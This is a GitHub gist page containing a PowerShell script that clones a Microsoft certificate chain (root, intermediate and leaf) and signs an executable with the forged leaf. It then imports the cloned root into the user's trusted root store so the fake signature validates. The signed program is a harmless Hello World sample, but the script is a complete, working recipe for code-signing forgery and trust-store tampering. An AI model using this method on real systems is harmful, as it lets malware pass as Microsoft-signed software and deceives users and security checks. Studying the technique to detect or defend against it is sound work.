-
-
Save AmmarHaddadi/2bcfc8cafb795d2799fdc43607163aa0 to your computer and use it in GitHub Desktop.
The steps required to clone a legitimate certificate chain and sign code with it.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # We'll just store the cloned certificates in current user "Personal" store for now. | |
| $CertStoreLocation = @{ CertStoreLocation = 'Cert:\CurrentUser\My' } | |
| $MS_Root_Cert = Get-PfxCertificate -FilePath C:\Test\MSKernel32Root.cer | |
| $Cloned_MS_Root_Cert = New-SelfSignedCertificate -CloneCert $MS_Root_Cert @CertStoreLocation | |
| $MS_PCA_Cert = Get-PfxCertificate -FilePath C:\Test\MSKernel32PCA.cer | |
| $Cloned_MS_PCA_Cert = New-SelfSignedCertificate -CloneCert $MS_PCA_Cert -Signer $Cloned_MS_Root_Cert @CertStoreLocation | |
| $MS_Leaf_Cert = Get-PfxCertificate -FilePath C:\Test\MSKernel32Leaf.cer | |
| $Cloned_MS_Leaf_Cert = New-SelfSignedCertificate -CloneCert $MS_Leaf_Cert -Signer $Cloned_MS_PCA_Cert @CertStoreLocation | |
| # Create some sample code to practice signing on | |
| Add-Type -TypeDefinition @' | |
| public class Foo { | |
| public static void Main(string[] args) { | |
| System.Console.WriteLine("Hello, World!"); | |
| System.Console.ReadKey(); | |
| } | |
| } | |
| '@ -OutputAssembly C:\Test\HelloWorld.exe | |
| # Validate that that HelloWorld.exe is not signed. | |
| Get-AuthenticodeSignature -FilePath C:\Test\HelloWorld.exe | |
| # Sign HelloWorld.exe with the cloned Microsoft leaf certificate. | |
| Set-AuthenticodeSignature -Certificate $Cloned_MS_Leaf_Cert -FilePath C:\Test\HelloWorld.exe | |
| # The certificate will not properly validate because the root certificate is not trusted. | |
| # View the StatusMessage property to see the reason why Set-AuthenticodeSignature returned "UnknownError" | |
| # "A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider" | |
| Get-AuthenticodeSignature -FilePath C:\Test\HelloWorld.exe | Format-List * | |
| # Save the root certificate to disk and import it into the current user root store. | |
| # Upon doing this, the HelloWorld.exe signature will validate properly. | |
| Export-Certificate -Type CERT -FilePath C:\Test\MSKernel32Root_Cloned.cer -Cert $Cloned_MS_Root_Cert | |
| Import-Certificate -FilePath C:\Test\MSKernel32Root_Cloned.cer -CertStoreLocation Cert:\CurrentUser\Root\ | |
| # You may need to start a new PowerShell process for the valid signature to take effect. | |
| Get-AuthenticodeSignature -FilePath C:\Test\HelloWorld.exe |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment